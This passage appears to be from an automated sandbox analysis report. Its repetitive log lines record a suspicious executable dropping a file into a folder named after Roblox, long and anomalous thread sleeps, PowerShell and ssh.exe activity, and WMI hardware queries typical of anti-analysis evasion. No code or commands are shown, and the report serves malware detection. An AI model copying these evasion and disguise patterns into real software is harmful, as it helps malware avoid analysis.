                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599641
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599532
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599407
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599188
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599063
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598938
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598813
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598688
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598578
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598469
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598344
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598235
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598109
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597891
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597781
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597665
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597563
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597438
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597219
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597094
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596985
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596860
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596735
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596610
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596485
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596360
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596235
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596110
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595985
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595860
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595735
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595610
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595485
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595360
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595235
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599546
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599437
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599107
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598984
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598765
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598656
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598546
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598437
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598218
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598107
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597970
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597844
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597077
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596953
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596843
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596078
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595969
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 582622
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeWindow / User API: threadDelayed 524
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6412
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2335
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow / User API: threadDelayed 3339
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow / User API: threadDelayed 6279
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow / User API: threadDelayed 6523
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow / User API: threadDelayed 2597
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe TID: 6496Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe TID: 1184Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe TID: 7352Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -19369081277395017s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599875s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599766s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599641s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599532s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599407s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599297s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599188s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599063s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598938s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598813s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598688s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598578s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598469s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598344s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598235s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598109s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598000s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597891s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597781s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597665s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597563s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597438s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597328s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597219s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597094s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596985s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596860s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596735s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596610s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596485s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596360s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596235s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596110s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595985s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595860s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595735s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595610s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595485s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595360s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595235s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 4452Thread sleep count: 6523 > 30
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 4452Thread sleep count: 2597 > 30
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -22136092888451448s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599875s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599765s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599655s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599546s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599437s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599328s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599218s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599107s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598984s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598875s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598765s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598656s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598546s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598437s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598328s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598218s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598107s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597970s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597844s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597734s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597625s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597515s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597406s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597297s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597187s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597077s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596953s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596843s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596734s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596625s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596515s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596406s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596297s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596187s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596078s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -595969s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -582622s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7732Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 128812Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 328804Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 491792Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeLast function: Thread delayed
                  Source: C:\Windows\System32\OpenSSH\ssh.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\OpenSSH\ssh.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599766
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599641
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599532
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599407
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599188
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599063
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598938
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598813
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598688
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598578
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598469
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598344
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598235
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598109
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597891
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597781
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597665
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597563
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597438
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597219
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597094
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596985
